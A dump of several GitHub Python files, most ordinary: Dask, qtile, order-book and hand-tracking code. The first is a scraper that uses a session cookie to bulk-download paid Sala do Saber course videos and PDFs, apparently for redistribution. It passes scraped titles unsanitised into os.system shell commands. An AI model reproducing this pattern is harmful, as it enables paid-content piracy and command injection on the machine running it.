os.system('cls')\n\n salasaber_session.headers.clear()\n self.headers_auth = {\n 'authority': 'saladosaber.com.br',\n 'cache-control': 'max-age=0',\n 'upgrade-insecure-requests': '1',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'sec-fetch-site': 'same-origin',\n 'sec-fetch-mode': 'navigate',\n 'sec-fetch-user': '?1',\n 'sec-fetch-dest': 'document',\n 'referer': 'https://saladosaber.com.br/auth',\n 'accept-language': 'pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7',\n 'cookie': f'ci_session={ci_session}; TawkConnectionTime=0'\n } #O Header que usaremos daqui para frente, cujo ele tem salvo sua SESSION\n salasaber_session.headers.update(self.headers_auth)\n classes_path = 'https://saladosaber.com.br/users/account' #Pagina que usaremos como base para iniciar a extração de dados\n classes_get = salasaber_session.get(classes_path, headers=self.headers_auth) # Converte a pagina para texto\n self.get_courses(classes_get.content) #Vamos iniciar a extração passando nosso texto para essa def\n \n\n def get_courses(self, classes_get): #Essa def recebe o HTML para iniciar as analises\n\n sdsaber_infos = bs(classes_get, 'html.parser') #Converte a pagina de texto para PURO HTML\n print('Sessão Autenticada\\n')\n courses_main = sdsaber_infos.find('ul', class_='list-unstyled categories')\n courses_list = courses_main.findAll('li', class_='item') #Procura pela lista de CURSOS\n for course in courses_list: #Tudo que segue aqui era ser repedito conforme o numero de CURSOS existentes na conta\n course_title = self.replacer(course.getText()) #Titulo do foco do Curso\n course_link = course.find('a')['href'] #Link do curso\n open_course = salasaber_session.get(course_link, headers=self.headers_auth).text #Para cada link detectado iremos entrar na pagina dele\n get_info = bs(open_course, 'html.parser') #Transformar o texto em HTML\n get_blocks = get_info.findAll(class_='col-12 mb-4') #Separamos em lista os blocos de cursos\n print(course_title)\n for info in get_blocks: #Será repedito até passar por todos os blocos de cursos\n title_group = info.find('h1', class_='title mb-4') \n title_group_text = self.replacer(title_group.getText()) #Titulo referente ao bloco\n print('\\t' + title_group_text) \n new_block = info.findAll('div', class_='item d-inline-block') #Indexamos em uma lista todos as materias que aparecem na pagina\n for new in new_block: #Será repetido em todas as materias dentro do bloco\n slick_list = new.find('a') \n new_title = self.replacer(slick_list.find(class_='img-fluid')['alt']) #Salvo o titulo da materia\n img_link = slick_list.find(class_='img-fluid')['src']\n slick_link = slick_list['href'] #O link da materia\n print(f'\\t\\t{new_title}') \n aulas = bs(salasaber_session.get(slick_link, headers=self.headers_auth).text, 'html.parser') #Acessa a materia e converte a pagina de texto para HTML\n list_aula = aulas.find('ul', class_='list-unstyled items')\n try:\n topic_aula = list_aula.findAll('li')\n except:\n continue #Listagem dos videos\n #print(topic_aula[0])\n #exit(0)\n fuller_path = \"Sala do Saber/\" + course_title + '/' + title_group_text + '/'+ new_title #Caminho qual será salvo nossos arquivos\n \n if os.path.exists(fuller_path) is False:\n os.makedirs(fuller_path) #Se as pastas não existe, ele cria.\n if os.path.exists(f'{fuller_path}/{new_title}.png') is False:\n urllib.request.urlretrieve(img_link, filename=f'{fuller_path}/{new_title}.png')\n print(f'\\t\\t{new_title} - IMG') \n \n for topic in topic_aula: #Iremos pegar as informações da pagina/aula\n \n #aula_link = topic.get('data-url')\n aula_link = topic['data-url']\n aula_title = self.replacer(topic.find('h1').getText().strip()) #Titulo da Aula\n if os.path.exists(f'{fuller_path}/{aula_title}.mp4'):\n continue\n \n \n topic_class = bs(salasaber_session.get(aula_link, headers=self.headers_auth).content, 'html.parser')\n #print(topic_class)\n if len(topic_class) == 0:\n print(f'\\t\\t\\t{aula_title} - Não baixada - Aula não encontrada - {aula_link}')\n continue\n try:\n source = topic_class.find('div', class_='lesson').find('input', {'name': 'video-source'})['value']\n except:\n continue\n #print(source)\n #m3u8_file = source.replace('m3u8', '_720.m3u8')\n \n self.vimeo_downloader(source, fuller_path, aula_title)\n #self.vimeo_downloader(vimeo_video, fuller_path, aula_title) #Def utilizada exclusivamente para baixar os videos\n self.download_files(topic_class, fuller_path, aula_title) #Def utilizada exclusivamente para baixar os arquivos\n try:\n #track = f'https://cdn.saladosaber.com.br/HLS/{vimeo_id}.hd/{vimeo_id}.hd.vtt'\n track = topic_class.find('div', class_='lesson').find('track')['src']\n if os.path.exists(f'{fuller_path}/{aula_title}.vtt') is False:\n os.system(f'aria2c -o \"{fuller_path}/{aula_title}.vtt\" \"{track}\" --quiet')\n #urllib.request.urlretrieve(track, filename=f'{fuller_path}/{aula_title}.vtt')\n print(f'\\t\\t\\t\\t{aula_title} - Legenda')\n except:\n #print(f'\\t\\t\\t\\t{aula_title} - Legenda jã baixada.')\n pass\n \n\n def vimeo_downloader(self, link, path, title): #Em resumo essa def baixa os videos da VIMEO na melhor qualidade possivel\n\n metodo = 'non'\n video_path = f'{path}/{title}.mp4'\n #https://cdn.saladosaber.com.br/HLS/370394426.hd/370394426.hd.m3u8\n #http://player.vimeo.com/video/370394426/config\n vimeo_link_id = link.split('/')[-1].split('.')[0]\n vimeo_video = f'http://player.vimeo.com/video/{vimeo_link_id}'\n try:\n if os.path.exists(video_path) is False:\n vimeo_headers = {\n 'Connection': 'keep-alive',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'Sec-Fetch-Site': 'cross-site',\n 'Sec-Fetch-Mode': 'navigate',\n 'Sec-Fetch-Dest': 'iframe',\n 'Referer': 'https://saladosaber.com.br',\n 'Accept-Language': 'pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7',\n }\n\n vimeo_config = requests.get(f'{vimeo_video}/config', headers=vimeo_headers).json()\n vimeo_download = sorted(vimeo_config[\"request\"][\"files\"][\"progressive\"], key = lambda i:i['height'])\n vimeo_url = vimeo_download[-1]['url']\n\n \n #os.system(f'''ffmpeg -i {vimeo_url} -nostats -loglevel 0 -bsf:a aac_adtstoasc -vcodec copy -c copy -crf 50 \"{video_path}\"''') \n os.system(f'aria2c -o \"{video_path}\" \"{vimeo_url}\" --quiet')\n metodo = 'Aria2c' \n except:\n pass\n if os.path.exists(video_path) is False:\n os.system(f'ffmpeg -i \"{link}\" \"{video_path}\" -preset ultrafast -nostats -loglevel 0')\n metodo = 'FFMPEG'\n print(f'\\t\\t\\t{title} - {metodo}')\n \n \n def download_files(self, text, path, aula_title): #Essa def é utilizada para baixarmos os arquivos disponibilizados pela plataforma\n\n file_path = f'{path}/Arquivos Disponiveis' #Nosso caminho de download\n files_video = text.find('div', class_='col-12 col-lg-3 lesson-files') \n files_video = files_video.find('ul', class_='list-unstyled').findAll('li') #Lista exclusiva dos arquivos de cada video separado, quando existir.\n #print(files_video)\n try: #Como não é sempre que pode existir, usamos um try\n files_content = text.find('div', class_='col-12 lesson-files')\n files_content = files_content.find('ul', class_='list-unstyled').findAll('li') #Indexar em lista todos os arquivos\n for files in files_content: #Repetir por todos os arquivos do video.\n file_link = files.find('a')['href'] #Link do arquivo\n file_title = self.replacer(files.find('a').getText().strip()) #Titulo do arquivo\n if os.path.exists(file_path) is False: #Verificador da Pasta ARQUIVOS GERAIS\n os.makedirs(file_path)\n if os.path.exists(f'{file_path}/{file_title}.pdf') is False:\n print('\\t\\t\\t' + file_title) #Essa parte verifica se o arquivo existe e faz o download na pasta indicada\n path_file = f'{file_path}/{file_title}.pdf'\n os.system(f'aria2c -o \"{path_file}\" \"{file_link}\" --quiet') \n #urllib.request.urlretrieve(file_link, filename=f'{file_path}/{file_title}.pdf')\n except:\n pass\n\n for files in files_video: #Repetir por todos os arquivos do video.\n file_link = files.find('a')['href']\n file_title = self.replacer(files.find('a').getText().strip())\n \n if os.path.exists(f'{file_path}/{aula_title}') is False:\n os.makedirs(f'{file_path}/{aula_title}')\n if os.path.exists(f'{file_path}/{aula_title}/{file_title}.pdf') is False:\n print('\\t\\t\\t\\t' + file_title) #Essa parte verifica se o arquivo existe e faz o download na pasta indicada\n #urllib.request.urlretrieve(file_link, filename=f'{file_path}/{aula_title}/{file_title}.pdf')\n path_file = f'{file_path}/{aula_title}/{file_title}.pdf'\n os.system(f'aria2c -o \"{path_file}\" \"{file_link}\" --quiet')\n \n def replacer(self, text): #Essa Def é responsavel unicicamente por tirar os caracteres incorretos para se ter um PATH\n invalid = {'.pdf': '', '..': '', r'\"': r\"'\", '\\\\': \" - \", '/': \"-\", '|': \" - \", '<': \"«\", '>': \"»\", '*': \"x\", ':': ' -', '?': \"¿\", '\\n': ' - '}\n for char in invalid:\n if char in text:\n text = text.replace(char, invalid[char])\n return text\n\n\"\"\"start = Downloader()\n\nprint('#####################')\nprint(' SALA DO SABER')\nprint('#####################\\n')\n\nstart.index()\"\"\" #Aqui que tudo inicia, chamando nossa classe de Downloader\n\n","repo_name":"FranciscoAlveJr/Bot_Telegram","sub_path":"Cursos/Sala_do_Saber_Downloader.py","file_name":"Sala_do_Saber_Downloader.py","file_ext":"py","file_size_in_byte":12821,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"69964321225","text":"# Simple script to test dask clutser\nimport dask.dataframe as dd\nimport os\nimport pandas as pd\n\nfrom calitp_data_infra.storage import get_fs\nfs = get_fs()\n\nRT_GCS = 'gs://calitp-analytics-data/data-analyses/rt_delay/compiled_cached_views/'\nDASK_GCS = 'gs://calitp-analytics-data/data-analyses/dask_test/'\n\nanalysis_date = \"2022-10-12\"\n\ndef categorize_time_of_day(value: int ) -> str:\n if isinstance(value, int):\n hour = value\n if hour < 4:\n return \"Owl\"\n elif hour < 7:\n return \"Early AM\"\n elif hour < 10:\n return \"AM Peak\"\n elif hour < 15:\n return \"Midday\"\n elif hour < 20:\n return \"PM Peak\"\n else:\n return \"Evening\"\n \n \ndef merge_stop_times_to_trips(stop_times: dd.DataFrame, \n trips: dd.DataFrame) -> dd.DataFrame: \n shape_id_cols = [\"calitp_itp_id\", \"shape_id\"]\n\n merged = dd.merge(\n stop_times,\n trips[shape_id_cols + [\"trip_id\"]].drop_duplicates(),\n on = [\"calitp_itp_id\", \"trip_id\"]\n )\n \n return merged\n\n\n\ndef aggregation_function(df: dd.DataFrame) -> dd.DataFrame:\n shape_id_cols = [\"calitp_itp_id\", \"shape_id\"]\n\n # Map to time-of-day\n stop_times_binned = df.assign(\n time_of_day=df.apply(\n lambda x: categorize_time_of_day(x.departure_hour), axis=1, \n #meta=('time_of_day', 'str')\n )\n )\n \n # Calculate the number of arrivals by time-of-day\n arrivals = (stop_times_binned.groupby(shape_id_cols + [\"time_of_day\"])\n .agg({\"stop_id\": \"count\"})\n .reset_index()\n )\n \n return arrivals\n\n\nif __name__==\"__main__\":\n from dask.distributed import Client\n\n client = Client(\"dask-scheduler.dask.svc.cluster.local:8786\")\n \n stop_times = dd.read_parquet(f\"{RT_GCS}st_{analysis_date}.parquet\")\n trips = dd.read_parquet(f\"{RT_GCS}trips_{analysis_date}.parquet\")\n \n merged = merge_stop_times_to_trips(stop_times, trips) \n merged = merged.repartition(npartitions=3)\n print(\"partitioned\")\n \n # Save to parquet\n merged.to_parquet(\n f\"{DASK_GCS}test\", \n storage_options={'token': fs.credentials.credentials}\n )\n print(\"save to GCS as partitioned\")\n\n df = dd.read_parquet(f\"{DASK_GCS}test\")\n print(\"read from GCS as partitioned\")\n \n df = df.map_partitions(aggregation_function, \n meta = {\n \"calitp_itp_id\": \"int\", \n \"shape_id\": \"str\",\n \"time_of_day\": \"str\",\n \"stop_id\": \"int\",\n }) # Be sure not to '.compute' here\n print(\"aggregation function\")\n\n df.compute().to_parquet(f'{DASK_GCS}preprocesed.parquet', \n storage_options={'token': fs.credentials.credentials}\n )\n print(\"saved preprocessed\")\n\n client.close()","repo_name":"cal-itp/data-analyses","sub_path":"starter_kit/simple_dask.py","file_name":"simple_dask.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"81"} +{"seq_id":"36444515005","text":"from libqtile.command import lazy\nfrom groups import ROWS, COLUMNS\nfrom libqtile.core.manager import Qtile\nfrom libqtile.hook import fire\nfrom libqtile import qtile as q\nfrom libqtile.log_utils import logger\n\n# from libqtile.command_client import InteractiveCommandClient\n\n\nclass Functions:\n @staticmethod\n def window_to_prev_group():\n @lazy.function\n def __inner(qtile):\n i = qtile.groups.index(qtile.current_group)\n\n if qtile.current_window and i != 0:\n group = qtile.groups[i - 1].name\n qtile.current_window.togroup(group, switch_group=True)\n\n return __inner\n\n @staticmethod\n def switch_focus(direction: int):\n @lazy.function\n def __inner(qtile: Qtile):\n group_i = qtile.current_group.name.split(\"-\")[0]\n windows = [\n w\n for w in qtile.windows_map.values()\n if w.group.name.split(\"-\")[0] == group_i\n ]\n # 0=left, 1=bottom, 2=top, 3=right\n current_focus = qtile.current_window\n if current_focus is None:\n current_focus = qtile.current_screen\n\n current_x, current_y = current_focus.x, current_focus.y\n target = None\n for w in windows:\n if w != current_focus:\n if (\n direction == 0\n # and w.y >= current_y\n and w.x < current_x\n and (target is None or w.x > target.x)\n ):\n target = w\n if (\n direction == 3\n # and w.y >= current_y\n and w.x > current_x\n and (target is None or w.x < target.x)\n ):\n target = w\n if (\n direction == 1\n and w.x >= current_x\n and w.y < current_y\n and (target is None or w.y > target.y)\n ):\n target = w\n if (\n direction == 2\n and w.x >= current_x\n and w.y > current_y\n and (target is None or w.y < target.y)\n ):\n target = w\n\n if target is not None:\n target.group.focus(target)\n qtile.focus_screen(target.group.screen.index)\n\n return __inner\n\n @staticmethod\n def move_window_to_screen(direction: int):\n @lazy.function\n def __inner(qtile: Qtile):\n so = int(qtile.current_group.name.split(\"-\")[1]) - 1\n i = int(qtile.current_group.name.split(\"-\")[0]) - 1\n\n # 0=left, 1=bottom, 2=top, 3=right\n current_focus = qtile.current_window\n current_x = qtile.current_screen.x\n target_screen = None\n if current_focus is not None:\n if direction == 0:\n for s in qtile.screens:\n if s.x < current_x and (\n target_screen is None or s.x > target_screen.x\n ):\n target_screen = s\n if direction == 3:\n for s in qtile.screens:\n if s.x > current_x and (\n target_screen is None or s.x < target_screen.x\n ):\n target_screen = s\n if target_screen is not None:\n target_group = (\n \"{0:0>2}\".format(i + 1)\n + \"-\"\n + \"{0:0>1}\".format(target_screen.index + 1)\n )\n current_focus.togroup(target_group)\n current_focus.group.focus(current_focus)\n qtile.focus_screen(current_focus.group.screen.index)\n\n return __inner\n\n screen_focus = [0 for s in range(ROWS * COLUMNS)]\n\n @staticmethod\n def span_groups():\n qtile = q\n if not hasattr(qtile, \"current_screen\"):\n return\n\n so = int(qtile.current_group.name.split(\"-\")[1]) - 1\n i = int(qtile.current_group.name.split(\"-\")[0]) - 1\n for s in range(len(qtile.screens)):\n target = [\n x\n for x in qtile.groups\n if x.name == \"{0:0>2}\".format(i + 1) + \"-\" + \"{0:0>1}\".format(s + 1)\n ]\n\n if len(target) > 0:\n qtile.screens[s].set_group(target[0], warp=False)\n\n # qtile.focus_screen(Functions.screen_focus[i])\n\n @staticmethod\n def screen_changed():\n qtile = q\n if not hasattr(qtile, \"current_screen\"):\n return\n\n so = int(qtile.current_group.name.split(\"-\")[1]) - 1\n i = int(qtile.current_group.name.split(\"-\")[0]) - 1\n # logger.warning(\"setting focused screen to \" + str(so))\n Functions.screen_focus[i] = so\n\n @staticmethod\n def focus_changed():\n qtile = q\n if not hasattr(qtile, \"current_window\") or not hasattr(\n qtile.current_window, \"name\"\n ):\n return\n # logger.warning(\"focus changed to \" + qtile.current_window.name)\n\n @staticmethod\n def switch_to_group_direction(direction: int, warp=False):\n @lazy.function\n def __inner(qtile: Qtile):\n so = int(qtile.current_group.name.split(\"-\")[1]) - 1\n i = int(qtile.current_group.name.split(\"-\")[0]) - 1\n # 0=left, 1=bottom, 2=top, 3=right\n current_row, current_column = i // COLUMNS, i % COLUMNS\n if direction == 0 or direction == 3:\n current_column += -1 if direction == 0 else 1\n current_column = (\n current_column + ROWS\n if current_column < 0\n else current_column % ROWS\n )\n current_column %= ROWS\n elif direction == 1 or direction == 2:\n current_row += -1 if direction == 2 else 1\n current_row = (\n current_row + COLUMNS if current_row < 0 else current_row % COLUMNS\n )\n new_index = current_row * COLUMNS + current_column\n target = [\n x\n for x in qtile.groups\n if x.name\n == \"{0:0>2}\".format(new_index + 1)\n + \"-\"\n + \"{0:0>1}\".format(Functions.screen_focus[new_index] + 1)\n ]\n\n if len(target) > 0:\n qtile.screens[Functions.screen_focus[new_index]].set_group(target[0])\n qtile.focus_screen(Functions.screen_focus[new_index])\n fire(\"changegroup\")\n\n return __inner\n\n @staticmethod\n def move_to_group_direction(direction: int):\n @lazy.function\n def __inner(qtile: Qtile):\n s = int(qtile.current_group.name.split(\"-\")[1]) - 1\n i = int(qtile.current_group.name.split(\"-\")[0]) - 1\n # 0=left, 1=bottom, 2=top, 3=right\n current_row, current_column = i // COLUMNS, i % COLUMNS\n if direction == 0 or direction == 3:\n current_column += -1 if direction == 0 else 1\n current_column = (\n current_column + ROWS\n if current_column < 0\n else current_column % ROWS\n )\n current_column %= ROWS\n elif direction == 1 or direction == 2:\n current_row += -1 if direction == 2 else 1\n current_row = (\n current_row + COLUMNS if current_row < 0 else current_row % COLUMNS\n )\n new_index = current_row * COLUMNS + current_column\n target = [\n x\n for x in qtile.groups\n if x.name\n == \"{0:0>2}\".format(new_index + 1) + \"-\" + \"{0:0>1}\".format(s + 1)\n ]\n\n if qtile.current_window and len(target) > 0:\n qtile.current_window.togroup(target[0].name, switch_group=True)\n fire(\"changegroup\")\n\n return __inner\n\n @staticmethod\n def window_to_next_group():\n @lazy.function\n def __inner(qtile):\n i = qtile.groups.index(qtile.current_group)\n\n if qtile.current_window and i != len(qtile.groups):\n group = qtile.groups[i + 1].name\n qtile.current_window.togroup(group, switch_group=True)\n\n return __inner\n\n ##### KILL ALL WINDOWS #####\n\n @staticmethod\n def kill_all_windows():\n @lazy.function\n def __inner(qtile):\n for window in qtile.current_group.windows:\n window.kill()\n\n return __inner\n\n @staticmethod\n def kill_all_windows_minus_current():\n @lazy.function\n def __inner(qtile):\n for window in qtile.current_group.windows:\n if window != qtile.current_window:\n window.kill()\n\n return __inner\n\n\nclass PWA:\n def __init__(self):\n pass\n\n @staticmethod\n def notion():\n return \"brave --profile-directory=Default --app=https://notion.so\"\n\n @staticmethod\n def music():\n return \"brave --profile-directory=Default --app=https://music.youtube.com/\"\n\n @staticmethod\n def spotify():\n return \"brave --profile-directory=Default --app=https://open.spotify.com/\"\n\n @staticmethod\n def youtube():\n return \"brave --user-data-dir=Default --app=https://www.youtube.com\"\n\n @staticmethod\n def calendar():\n return \"brave --profile-directory=Default --app=https://calendar.google.com/calendar/\"\n\n @staticmethod\n def habitica():\n return \"brave --profile-directory=Default --app=https://habitica.com/\"\n\n\nif __name__ == \"__main__\":\n print(\"This is an utilities module\")\n","repo_name":"ebeem/dotfiles","sub_path":".config/qtile/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":10080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20069172285","text":"import pandas as pd\n\ndef p2p_orderbook():\n # Load bid and ask data into separate pandas dataframes:\n bid_data = get_rates()\n ask_data = get_rates()\n\n # Sort the bid and ask dataframes by price and quantity:\n bid_data = bid_data.sort_values(['price', 'quantity'], ascending=[True, False])\n ask_data = ask_data.sort_values(['price', 'quantity'], ascending=[False, False])\n\n # Group the bid and ask dataframes by price and aggregate the quantity:\n bid_data = bid_data.groupby('price').agg({'quantity': 'sum'}).reset_index()\n ask_data = ask_data.groupby('price').agg({'quantity': 'sum'}).reset_index()\n\n # Rename the columns and add a column for the total quantity:\n bid_data.columns = ['BidP', 'BidQ']\n bid_data['total_bid_quantity'] = bid_data['BidQ'].cumsum()\n\n ask_data.columns = ['AskP', 'AskQ']\n # ask_data['total_ask_quantity'] = -ask_data['AskQ'].cumsum()\n # Note that we added a negative sign to the total ask quantity column to indicate that it represents the cumulative sum of negative quantities\n\n # Merge the bid and ask dataframes:\n orderbook = pd.merge(bid_data, ask_data, how='outer', left_on='BidP', right_on='AskP')\n\n # Fill any missing values with zero:\n orderbook = orderbook.fillna(0)\n\n # Calculate the spread:\n orderbook['spread'] = orderbook['AskP'] - orderbook['BidP']\n\n # orderbook = orderbook[\n # ['total_bid_quantity', 'bid(quantity)', 'bid(price)', 'ask(price)', 'ask(quantity)', 'total_ask_quantity']]\n\n orderbook = orderbook[\n ['BidQ', 'BidP', 'AskP', 'AskQ', 'spread']]\n\n df = orderbook.to_string(index=False)\n return df","repo_name":"otliq/orderbook","sub_path":"orderbook.py","file_name":"orderbook.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22898334060","text":"import re\nfrom unidecode import unidecode\n\n\nclass RegexManager:\n _regex_patterns = {}\n\n def get_pattern(self, pattern_id):\n if _verbose:\n print(f\"get_pattern ( pattern_id: {pattern_id} )\")\n\n if pattern_id not in self._regex_patterns:\n self._regex_patterns[pattern_id] = re.compile(pattern_id)\n\n return self._regex_patterns[pattern_id]\n\n\n# def byte_size_to_human_size(byte_size, suffix=\"B\"):\n# if _verbose:\n# print(f\"byte_size_to_human_size ( byte_size: {byte_size} , suffix: {suffix} )\")\n#\n# for unit in ['', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi']:\n# if abs(byte_size) < 1024.0:\n# return \"%3.1f%s%s\" % (byte_size, unit, byte_size)\n#\n# byte_size /= 1024.0\n#\n# return \"%.1f%s%s\" % (byte_size, 'Yi', suffix)\n\ndef byte_size_to_human_size(byte_size, do_round=True):\n if _verbose:\n print(f\"byte_size_to_human_size ( byte_size: {byte_size} , do_round: {do_round} )\")\n\n # 2**10 = 1024\n power = 2 ** 10\n n = 0\n power_labels = {0: \"\", 1: \"kilo\", 2: \"mega\", 3: \"giga\", 4: \"tera\"}\n\n while byte_size > power:\n byte_size /= power\n n += 1\n\n return (round(byte_size) if do_round else byte_size), power_labels[n] + \"bytes\"\n\n\n_verbose = False\nregex_manager = RegexManager()\nbefore_first_comma_pat = r\"^([^,])+\"\nafter_first_comma_and_space_pat = r\"(?<=\\, ).*\"\nonly_numbers_pat = r\"[^a-z ]\\ *([.0-9])*\\d\"\nnot_letters_pat = r\"[^a-zA-Z]\"\nnumber_groups_pat = r\"[0-9]+\"\nemail_validator_pat = r\"/\\b[\\w\\.-]+@[\\w\\.-]+\\.\\w{2,4}\\b/gi\"\n\n\ndef num_to_comma_str(num):\n if _verbose:\n print(f\"num_to_comma_str ( num: {num} )\")\n\n return \"{:,}\".format(num)\n\n\ndef strip_non_ascii(text):\n if type(text) is not str:\n return unidecode(str(text, encoding=\"utf-8\"))\n else:\n return text\n","repo_name":"QuantumCalzone/pythonutils","sub_path":"pythonutils/str_utils.py","file_name":"str_utils.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29303156715","text":"import cv2\nimport mediapipe\nimport math\nimport csv\n\n\ndef distance(a, b):\n\n return math.sqrt(math.pow((b[0]-a[0]),2)+math.pow(b[1]-a[1],2))\n\n\ndef search_point(pts_list, cord, target):\n\n if cord == \"x\":\n for i in range(len(pts_list)):\n if pts_list[i][0] == target:\n return pts_list[i]\n elif cord == \"y\":\n for i in range(len(pts_list)):\n if pts_list[i][1] == target:\n return pts_list[i]\n else:\n return\n\n\ndef landmark_recognition():\n\n camera_id = 0\n\n capture = cv2.VideoCapture(camera_id)\n\n drawingModule = mediapipe.solutions.drawing_utils\n handsModule = mediapipe.solutions.hands\n\n frameWidth = capture.get(cv2.CAP_PROP_FRAME_WIDTH)\n frameHeight = capture.get(cv2.CAP_PROP_FRAME_HEIGHT)\n\n\n result = \"\"\n\n with handsModule.Hands(static_image_mode=False, min_detection_confidence=0.7, min_tracking_confidence=0.7, max_num_hands=1) as hands:\n \n while True:\n \n ret, frame = capture.read()\n \n results = hands.process(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n \n if results.multi_hand_landmarks != None:\n\n for handLandmarks in results.multi_hand_landmarks:\n\n # Wrist (O)\n wrist = 0\n wrist_normalizedLandmark = handLandmarks.landmark[wrist]\n wrist_pixelCoordinatesLandmark = drawingModule._normalized_to_pixel_coordinates(wrist_normalizedLandmark.x, wrist_normalizedLandmark.y, frameWidth, frameHeight)\n\n # cv2.circle(frame, wrist_pixelCoordinatesLandmark, 5, (255, 255, 0), -1)\n\n # Thumb tip (A)\n thumbtip = 4\n thumbtip_normalizedLandmark = handLandmarks.landmark[thumbtip]\n thumbtip_pixelCoordinatesLandmark = drawingModule._normalized_to_pixel_coordinates(thumbtip_normalizedLandmark.x, thumbtip_normalizedLandmark.y, frameWidth, frameHeight)\n\n # cv2.circle(frame, thumbtip_pixelCoordinatesLandmark, 5, (0, 255, 0), -1)\n\n # Index finger tip (B)\n index_fingertip = 8\n index_fingertip_normalizedLandmark = handLandmarks.landmark[index_fingertip]\n index_fingertip_pixelCoordinatesLandmark = drawingModule._normalized_to_pixel_coordinates(index_fingertip_normalizedLandmark.x, index_fingertip_normalizedLandmark.y, frameWidth, frameHeight)\n\n # cv2.circle(frame, index_fingertip_pixelCoordinatesLandmark, 5, (0, 255, 0), -1)\n\n # Middle finger tip (C)\n mid_fingertip = 12\n mid_fingertip_normalizedLandmark = handLandmarks.landmark[mid_fingertip]\n mid_fingertip_pixelCoordinatesLandmark = drawingModule._normalized_to_pixel_coordinates(mid_fingertip_normalizedLandmark.x, mid_fingertip_normalizedLandmark.y, frameWidth, frameHeight)\n\n # cv2.circle(frame, mid_fingertip_pixelCoordinatesLandmark, 5, (0, 255, 0), -1)\n\n # Ring finger tip (D)\n ring_fingertip = 16\n ring_fingertip_normalizedLandmark = handLandmarks.landmark[ring_fingertip]\n ring_fingertip_pixelCoordinatesLandmark = drawingModule._normalized_to_pixel_coordinates(ring_fingertip_normalizedLandmark.x, ring_fingertip_normalizedLandmark.y, frameWidth, frameHeight)\n\n # cv2.circle(frame, ring_fingertip_pixelCoordinatesLandmark, 5, (0, 255, 0), -1)\n\n # Pinky tip (E)\n pinkytip = 20\n pinkytip_normalizedLandmark = handLandmarks.landmark[pinkytip]\n pinkytip_pixelCoordinatesLandmark = drawingModule._normalized_to_pixel_coordinates(pinkytip_normalizedLandmark.x, pinkytip_normalizedLandmark.y, frameWidth, frameHeight)\n\n # cv2.circle(frame, pinkytip_pixelCoordinatesLandmark, 5, (0, 255, 0), -1)\n\n # cv2.line(frame, wrist_pixelCoordinatesLandmark, thumbtip_pixelCoordinatesLandmark, (255, 102, 255), 2)\n # cv2.line(frame, wrist_pixelCoordinatesLandmark, index_fingertip_pixelCoordinatesLandmark, (255, 102, 255), 2)\n # cv2.line(frame, wrist_pixelCoordinatesLandmark, mid_fingertip_pixelCoordinatesLandmark, (255, 102, 255), 2)\n # cv2.line(frame, wrist_pixelCoordinatesLandmark, ring_fingertip_pixelCoordinatesLandmark, (255, 102, 255), 2)\n # cv2.line(frame, wrist_pixelCoordinatesLandmark, pinkytip_pixelCoordinatesLandmark, (255, 102, 255), 2)\n\n if wrist_pixelCoordinatesLandmark and index_fingertip_pixelCoordinatesLandmark and mid_fingertip_pixelCoordinatesLandmark and ring_fingertip_pixelCoordinatesLandmark and pinkytip_pixelCoordinatesLandmark:\n\n dist_OA = distance(a=wrist_pixelCoordinatesLandmark, b=thumbtip_pixelCoordinatesLandmark)\n dist_OB = distance(a=wrist_pixelCoordinatesLandmark, b=index_fingertip_pixelCoordinatesLandmark)\n dist_OC = distance(a=wrist_pixelCoordinatesLandmark, b=mid_fingertip_pixelCoordinatesLandmark)\n dist_OD = distance(a=wrist_pixelCoordinatesLandmark, b=ring_fingertip_pixelCoordinatesLandmark)\n dist_OE = distance(a=wrist_pixelCoordinatesLandmark, b=pinkytip_pixelCoordinatesLandmark)\n\n # print(\"Distance OA: {}\".format(dist_OA))\n # print(\"Distance OB: {}\".format(dist_OB))\n # print(\"Distance OC: {}\".format(dist_OC))\n # print(\"Distance OD: {}\".format(dist_OD))\n # print(\"Distance OE: {}\".format(dist_OE))\n\n right_most = max([wrist_pixelCoordinatesLandmark[0], thumbtip_pixelCoordinatesLandmark[0], index_fingertip_pixelCoordinatesLandmark[0], mid_fingertip_pixelCoordinatesLandmark[0], ring_fingertip_pixelCoordinatesLandmark[0], pinkytip_pixelCoordinatesLandmark[0]])\n left_most = min([wrist_pixelCoordinatesLandmark[0], thumbtip_pixelCoordinatesLandmark[0], index_fingertip_pixelCoordinatesLandmark[0], mid_fingertip_pixelCoordinatesLandmark[0], ring_fingertip_pixelCoordinatesLandmark[0], pinkytip_pixelCoordinatesLandmark[0]])\n upper_most = min([wrist_pixelCoordinatesLandmark[1], thumbtip_pixelCoordinatesLandmark[1], index_fingertip_pixelCoordinatesLandmark[1], mid_fingertip_pixelCoordinatesLandmark[1], ring_fingertip_pixelCoordinatesLandmark[1], pinkytip_pixelCoordinatesLandmark[1]])\n lower_most = max([wrist_pixelCoordinatesLandmark[1], thumbtip_pixelCoordinatesLandmark[1], index_fingertip_pixelCoordinatesLandmark[1], mid_fingertip_pixelCoordinatesLandmark[1], 